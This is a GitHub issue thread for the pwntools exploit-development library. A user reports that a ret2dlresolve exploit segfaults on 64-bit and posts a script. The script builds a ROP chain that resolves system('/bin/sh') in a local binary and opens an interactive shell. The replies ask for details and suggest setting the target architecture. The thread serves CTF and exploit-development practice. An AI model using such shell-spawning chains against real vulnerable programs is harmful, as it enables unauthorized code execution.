search

Gallopsled / pwntools

CTF framework and exploit development library
http://pwntools.com
Other
12.17k stars 1.72k forks source link

ret2dlresolve segfaulting. #2417

Open rectanglestuff opened 5 months ago

rectanglestuff commented 5 months ago

get segfault for 64 bit, the 64+context.bytes are 72, and this seems to be the correct offset for the 64bit example.

on 32 bit p.send(fit({76: rop.chain(), 200: dlresolve.payload})) getting still a shell

from pwn import *

context.binary = elf = ELF('./main')
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])

rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)

raw_rop = rop.chain()
print(rop.dump())
print(64+context.bytes)

p = elf.process()
p.sendline(fit({64+context.bytes:rop.chain(), 200:dlresolve.payload}))
p.interactive()
Arusekk commented 5 months ago

Thank you for contributing to pwntools. In order for us to be able to help you, we need more information.

  1. What have you done?
  2. What did you expect?
  3. What happened instead?
  4. What version of pwntools are you using (pwn version), what scripts and binaries have you used, can we reproduce it too?
RocketMaDev commented 5 months ago

Try adding context.arch = 'amd64' at line 3? Pwntools have 32bit and 64bit payloads and 32bit is the default option.